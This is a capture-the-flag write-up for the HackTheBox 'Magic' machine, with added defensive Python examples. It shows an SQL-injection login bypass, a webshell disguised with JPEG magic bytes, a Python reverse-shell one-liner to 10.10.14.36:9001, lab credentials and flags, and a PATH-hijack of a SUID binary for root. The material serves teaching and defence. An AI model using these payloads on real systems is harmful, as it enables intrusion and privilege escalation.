Setup
mkdir -p ~/ctf/HackTheBox/magic/scans; cd ~/ctf/HackTheBox/magic
IP Address: 10.10.10.185
echo "10.10.10.185 magic.htb" | sudo tee -a /etc/hosts
10.10.10.185 magic.htb
Enumeration
nmap -sC -sV -Pn -p- magic.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 magic.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ=
| 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Using ffuf and gobuster, we try to enumerate directories and subdomains, but nothing of use turns up.
Then I shift my focus to the login page we were given, checking for SQLi and other web attacks.
Using the basic ' or '1'='1 test, we get access to the upload page:

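To show why the ' or '1'='1 test above works, here is an added example (not code from the write-up or from the box) with a constructed in-memory SQLite "login" table and a placeholder credential: one login routine builds the query by string concatenation, the other binds the input as a parameter. The table name and column names are assumptions for the demo.

```python
import sqlite3

# Constructed demo database: one "login" table with a single placeholder user.
# The credential is invented for the example and is not the box's.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES ('admin', 'placeholder-password')")
    return conn

def login_vulnerable(conn, username, password):
    """Query built by concatenation: user input is parsed as SQL.
    With ' or '1'='1 in either field the WHERE clause is always true."""
    query = ("SELECT username FROM login WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterised query: the same input is bound as data, so the
    quote characters never reach the SQL parser."""
    row = conn.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

# The bypass string from the write-up.
PAYLOAD = "' or '1'='1"

if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable, payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))   # True
    print("safe, payload:     ", login_safe(db, PAYLOAD, PAYLOAD))         # False
```

The concatenated query turns into `... WHERE username = '' or '1'='1' AND password = '' or '1'='1'`, and the trailing `or '1'='1'` makes the whole predicate true regardless of the credentials; the bound version compares the literal string and finds no match.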
If we try uploading a .php file, we get an error:

Let's try adding .jpg to the end of the filename; we still get the following error:

Now we test a file containing a parameterised webshell, with JPEG magic bytes inserted at the start of the file, to check whether the upload is validated by its magic bytes.

The payload image was uploaded successfully; let's test it for command execution.

Command execution is working:

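The upload check on the box accepted a file once it started with JPEG magic bytes. The following added example (my own code, not the site's upload handler) contrasts that signature-only check with a validator that also enforces an extension allowlist, rejects double extensions such as shell.php.jpg, and refuses bodies that carry script markers. The sample files are constructed; the "polyglot" body contains only an empty PHP comment as a marker, not a payload.

```python
import os
import secrets

# Image signatures the demo accepts, keyed by the extension they must match.
MAGIC = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
# Byte sequences that have no business in an image body.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

def check_magic_only(data):
    """Weak check, roughly what the write-up ran into: any known image
    signature at offset 0 is enough, whatever follows it."""
    return any(data.startswith(sig) for sigs in MAGIC.values() for sig in sigs)

def check_upload(filename, data):
    """Hardened check. Returns (accepted, reason)."""
    base = os.path.basename(filename)          # drop any path component
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in MAGIC:
        return False, "extension not in allowlist"
    if "." in root:                            # shell.php.jpg -> root is "shell.php"
        return False, "multiple extensions rejected"
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match the claimed type"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "embedded script markers"
    return True, "ok"

def storage_name(ext):
    """Server-chosen name for an accepted file, so the uploader never
    controls the filename the web server sees."""
    return secrets.token_hex(16) + ext.lower()

# Constructed samples: a minimal JPEG header plus padding, and the same
# header followed by a harmless PHP marker.
GOOD_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
POLYGLOT = b"\xff\xd8\xff\xe0" + b"<?php /* constructed marker, no payload */ ?>"

if __name__ == "__main__":
    print("signature-only check on polyglot:", check_magic_only(POLYGLOT))        # True
    print("hardened check on polyglot:      ", check_upload("shell.php.jpg", POLYGLOT))
```

A marker scan is a backstop, not the main defence: on a real server the accepted image should be re-encoded through an image library, stored outside the web root under the name from storage_name(), and served from a location where PHP execution is disabled.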
Using https://www.revshells.com/ we get a bash command for a reverse shell back to our machine, which we can then inject through the browser.
We are able to spawn a reverse shell using the Python installed on the server with the payload:
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.36",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
In the home directory we find a Magic directory containing a db.php5 file with database credentials:

theseus:iamkingtheseus
The above credentials don't work for SSH.
Using the mysqldump binary already present on the box, we supply the known username, password and database name and recover a password from the login table:

Trying su with this password:
theseus:Th3s3usW4sK1ng

Now we have a shell as theseus and can read the user flag.
User Flag
Location: /home/theseus/user.txt | Flag: 12dc7fc9f7489a4f8c1a40f1a1aefa8e
Privilege Escalation
Using find / -perm -u=s -type f 2>/dev/null
we get the following SUID files, in particular a binary named sysinfo:

When we run it, it outputs system info such as CPU, disk and memory. Using ltrace we see that this program calls fdisk without an absolute path:

I make a bash script containing a reverse shell and name the file fdisk.

Then I add the tmp folder to the start of the PATH variable so that the OS searches for fdisk in the tmp folder first.

When we run sysinfo, we get a reverse shell as root and can read the root flag.
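The root step works because a privileged program looked up fdisk through a PATH its caller controls. As an added example (my own code, not the sysinfo binary or anything from the box), the script below audits where a command name resolves under a given PATH, flags search directories writable by group or others, and shows the fix a privileged helper needs: resolve the tool from a fixed trusted path and run it with a scrubbed environment. The demo() function builds a constructed scenario in a fresh temporary directory given /tmp-style 1777 permissions; the fake fdisk it writes there is a placeholder file that is never executed.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Fixed search path a privileged helper should use instead of inheriting PATH.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"

def resolve_command(name, search_path):
    """File that `name` resolves to under `search_path` (first match), or None."""
    return shutil.which(name, path=search_path)

def other_writable_dirs(search_path):
    """Entries of search_path that exist and are writable by group or others."""
    risky = []
    for d in search_path.split(os.pathsep):
        if not d or not os.path.isdir(d):
            continue
        mode = os.stat(d).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(d)
    return risky

def audit_lookup(name, search_path):
    """Where `name` resolves, which search dirs are attacker-writable, and
    whether the resolved file lives in one of them (a shadowed lookup)."""
    target = resolve_command(name, search_path)
    risky = other_writable_dirs(search_path)
    shadowed = target is not None and os.path.dirname(target) in risky
    return {"resolved": target, "writable_dirs": risky, "shadowed": shadowed}

def run_trusted(name, args=()):
    """The defensive pattern: absolute path from TRUSTED_PATH, minimal env."""
    target = resolve_command(name, TRUSTED_PATH)
    if target is None:
        raise FileNotFoundError(f"{name} not found under {TRUSTED_PATH}")
    env = {"PATH": TRUSTED_PATH, "LC_ALL": "C"}
    return subprocess.run([target, *args], env=env, capture_output=True, text=True)

def demo():
    """Constructed scenario: a world-writable directory prepended to PATH
    holds a file named fdisk. Returns (audit with hijacked PATH, audit with
    TRUSTED_PATH)."""
    tmp = tempfile.mkdtemp()
    os.chmod(tmp, 0o1777)                      # mimic /tmp permissions
    fake = os.path.join(tmp, "fdisk")          # placeholder, never run
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho placeholder\n")
    os.chmod(fake, 0o755)
    hijacked = audit_lookup("fdisk", tmp + os.pathsep + TRUSTED_PATH)
    trusted = audit_lookup("fdisk", TRUSTED_PATH)
    return hijacked, trusted

if __name__ == "__main__":
    hijacked, trusted = demo()
    print("with /tmp-style dir first:", hijacked)   # shadowed: True
    print("with trusted path only:  ", trusted)     # shadowed: False
```

The same audit can be run against a SUID binary's observed lookups (the names ltrace showed) to confirm whether any of them would be served from a directory an unprivileged user can write to; the durable fix is in the binary itself, which should call /sbin/fdisk by absolute path and set PATH before any exec.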


Root Flag
Location: /root/root.txt | Flag: a0e2edc812d8ab00826e45f64fa42977